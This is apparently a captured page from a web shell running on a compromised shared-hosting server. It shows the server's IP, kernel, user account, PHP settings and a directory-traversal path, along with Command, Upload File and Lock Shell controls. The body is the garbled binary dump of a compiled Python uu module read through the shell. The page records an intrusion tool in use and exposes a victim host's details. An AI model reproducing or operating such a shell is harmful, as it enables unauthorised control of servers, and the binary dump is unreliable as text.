Server IP : 217.21.91.109 / Your IP : 216.73.216.234 Web Server : LiteSpeed System : Linux in-mum-web830.main-hosting.eu 4.18.0-553.34.1.lve.el8.x86_64 #1 SMP Thu Jan 9 16:30:32 UTC 2025 x86_64 User : u903744608 ( 903744608) PHP Version : 8.2.27 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /etc/fonts/../my.cnf.d/../../../opt/../../usr/lib64/python2.7/ |
[ Home ] | [ C0mmand ] | [ Upload File ] | [ Lock Shell ] | [ Logout ] |
---|
� zfc@s�dZddlZddlZddlZdddgZdefd��YZddd�Zdddd �Z d �Z edkr�e �ndS(s�Implementation of the UUencode and UUdecode functions. encode(in_file, out_file [,name, mode]) decode(in_file [, out_file, mode]) i����NtErrortencodetdecodecBseZRS((t__name__t __module__(((s/usr/lib64/python2.7/uu.pyR'scCs�g}z�|dkr!tj}n�t|t�r�|dkrQtjj|�}n|dkr�ytj|�j }Wq�t k r�q�Xnt|d�}|j|�n|dkr�tj }n.t|t�r�t|d�}|j|�n|dkrd}n|dkrd}n|jdd�}|jdd�}|jd |d @|f�|jd�}x;t|�dkr�|jtj|��|jd�}qjW|jd �Wdx|D]}|j�q�WXdS(s Uuencode filet-trbtwbi�s s\ns s\rsbegin %o %s i�i-is end N(tsyststdint isinstancet basestringtNonetostpathtbasenametstattst_modetAttributeErrortopentappendtstdouttreplacetwritetreadtlentbinasciitb2a_uutclose(tin_filetout_filetnametmodetopened_filestdatatf((s/usr/lib64/python2.7/uu.pyR*sB ic Cs�g}|dkrtj}n+t|t�rIt|�}|j|�nz^x�tr�|j�}|svtd��n|j d�s�qOn|j dd�}t|�dkrO|ddkrOyt|dd �PWq�t k r�q�XqOqOW|dkr4|dj�}tjj|�r4td |��q4n|dkrVt|dd �}n|dkrntj}n_t|t�r�t|d�}ytjj||�Wntk r�nX|}|j|�n|j�}x�|r�|j�dkr�ytj|�} Wnjtjk rs} t|d�d d@ddd}tj|| �} |sttjjd| �qtnX|j| �|j�}q�W|s�td��nWdx|D]}|j�q�WXdS(sDecode uuencoded fileRs'No valid begin line found in input filetbegint iiiiis"Cannot overwrite existing file: %sRtendi i?iisWarning: %s sTruncated input fileN(RR R RRRtTruetreadlineRt startswithtsplitRtintt ValueErrorRtrstripR RtexistsRtchmodRtstripRta2b_uutordtstderrRR( RRR tquietR!thdrt hdrfieldstfptsR"tvtnbytesR#((s/usr/lib64/python2.7/uu.pyRasf " $ cCs�ddl}|jdd�}|jddddd d dtdd �|jddddd ddtdd �|j�\}}t|�dkr�|jd�tjd�ntj }tj }t|�dkr�|d}nt|�dkr�|d}n|jrb|jrRt |t�r2t|d�}qRtjdGdGHtjd�nt||�nW|jr�t |t�r�t|d�}q�tjdGdGHtjd�nt||�dS(suuencode/uudecode main programi����Ntusages'usage: %prog [-d] [-t] [input [output]]s-ds--decodetdestRthelpsDecode (instead of encode)?tdefaulttactiont store_trues-ts--textttexts2data is text, encoded format unix-compatible text?isincorrect number of argumentsiitws: cannot do -t to stdouttrs: cannot do -t from stdin(toptparsetOptionParsert add_optiontFalset parse_argsRterrorRtexitR RRRAR RRtargvR(RDtparsertoptionstargstinputtoutput((s/usr/lib64/python2.7/uu.pyttest�s6(( t__main__(t__doc__RR Rt__all__t ExceptionRRRRRQR(((s/usr/lib64/python2.7/uu.pyt<module>s7D %